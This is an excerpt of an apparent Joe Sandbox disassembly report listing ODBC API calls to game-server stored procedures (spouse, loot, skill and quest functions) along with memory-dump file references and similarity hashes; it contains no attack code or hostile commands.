                                                                                      • Instruction Fuzzy Hash: 23212FB0B40258BBEB20CB85CC02FE973B5EB80B54F10C689F7556E2C8C6F569808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetSpouse] (?,?)},000000FD), ref: 00435161
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004351A3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004351D8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00435210
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetSpouse] (?,?)}, xrefs: 00435158
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetSpouse] (?,?)}
                                                                                      • API String ID: 0-1317761356
                                                                                      • Opcode ID: eaeb4354a7e1d53e2fca08c106d4141c33ed69adcf51f13f81de2bed3720e436
                                                                                      • Instruction ID: a699f556e39d2424e4cf836a3d778336a9b15985b4f5d1ef010d0026cf715501
                                                                                      • Opcode Fuzzy Hash: eaeb4354a7e1d53e2fca08c106d4141c33ed69adcf51f13f81de2bed3720e436
                                                                                      • Instruction Fuzzy Hash: 842100B0A44214ABEB24DF54CC52FAA7734EB84B1CF208289F7146E2C4D7B5A940CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_Get_Reward_Expect_Invens] (?, ?)},000000FD), ref: 0043E9B8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043E9F7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043EA2F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EA67
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_Get_Reward_Expect_Invens] (?, ?)}, xrefs: 0043E9AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_Get_Reward_Expect_Invens] (?, ?)}
                                                                                      • API String ID: 0-2337701118
                                                                                      • Opcode ID: 80a6ac4bc96b96d3a85b8ef5a33179b72964aca8d42e9d5c09d210c056a9917e
                                                                                      • Instruction ID: e89784e937fb55979675e9a30675c4bc3d57bb1fa48aae9cf28c55a1a9620e29
                                                                                      • Opcode Fuzzy Hash: 80a6ac4bc96b96d3a85b8ef5a33179b72964aca8d42e9d5c09d210c056a9917e
                                                                                      • Instruction Fuzzy Hash: 8821DEB1A44318BBEB288F44CD52FEB7374EB84B14F204289F7186E6D5D6B66D40CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetLootItems](?,?)},000000FD), ref: 00435B58
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00435B97
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00435BCF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00435C07
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetLootItems](?,?)}, xrefs: 00435B4F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetLootItems](?,?)}
                                                                                      • API String ID: 0-8194761
                                                                                      • Opcode ID: 2d8d2c23c3a93943bf776290d5b53fee5118d9ece4d47c635b4157a498262c78
                                                                                      • Instruction ID: 111ec6abc1ae4f06d2607980d6bfae14433f3100b4ec80a1b6b4aa028355501f
                                                                                      • Opcode Fuzzy Hash: 2d8d2c23c3a93943bf776290d5b53fee5118d9ece4d47c635b4157a498262c78
                                                                                      • Instruction Fuzzy Hash: 8C21CDB1644314ABEB64CB54CC52FA97379EB84B1CF2082C9F7146A2C5D7F56980CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetLadderQuestState](?,?)},000000FD), ref: 00433094
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004330D3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00433108
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433140
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetLadderQuestState](?,?)}, xrefs: 0043308B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetLadderQuestState](?,?)}
                                                                                      • API String ID: 0-3368334355
                                                                                      • Opcode ID: 37b2b173dfc41d21acf5e20e6341699f6bbd0db9b504dca965b7c70e0d69e4bd
                                                                                      • Instruction ID: 490ae47203727e5f8d9bf8052c4fb6b247157d5a5fe4fd6ef91018b7b0a14a1d
                                                                                      • Opcode Fuzzy Hash: 37b2b173dfc41d21acf5e20e6341699f6bbd0db9b504dca965b7c70e0d69e4bd
                                                                                      • Instruction Fuzzy Hash: A2210EB0A45358BBFB248F44DD52FAA7334EBC4B24F108289F7186E2C6D7B569408B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_DelSkill] (?,?)},000000FD), ref: 0042E0EB
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042E12A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042E15F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042E197
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_DelSkill] (?,?)}, xrefs: 0042E0E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_DelSkill] (?,?)}
                                                                                      • API String ID: 0-3246315627
                                                                                      • Opcode ID: ecf4f7914d39f33532ff36da661facf7aeca74957000983015aaae1d1c055d8d
                                                                                      • Instruction ID: ee87121ede0d2d6023e9ec4b05ef17414d0468f2f77965ddacdc0dd829c8faa1
                                                                                      • Opcode Fuzzy Hash: ecf4f7914d39f33532ff36da661facf7aeca74957000983015aaae1d1c055d8d
                                                                                      • Instruction Fuzzy Hash: BC2100B1A44714ABEB608F44CC52FAB7378EB84B19F209289F7146E2C4D7B57980CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetSpouse] (?,?)},000000FD), ref: 0043523A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00435279
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004352AE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004352E6
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetSpouse] (?,?)}, xrefs: 00435231
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetSpouse] (?,?)}
                                                                                      • API String ID: 0-718458878
                                                                                      • Opcode ID: 1cb15f114722fd0045b34e40cf07993f8baf009785b29990a6890a2a02a40f65
                                                                                      • Instruction ID: 7c72f1a5bb05ad3cb38a3afbcf1ccb9806e3abc73eafc8a7a80d68cea4db9d09
                                                                                      • Opcode Fuzzy Hash: 1cb15f114722fd0045b34e40cf07993f8baf009785b29990a6890a2a02a40f65
                                                                                      • Instruction Fuzzy Hash: 8B2103F46443146BEB249F44CC52FA97334EB8471CF304289F7186E2C5D7B56A80CB59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_DelAffectSkill] (?, ?)},000000FD), ref: 0042E33F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042E37E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042E3B3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042E3EB
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DelAffectSkill] (?, ?)}, xrefs: 0042E336
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
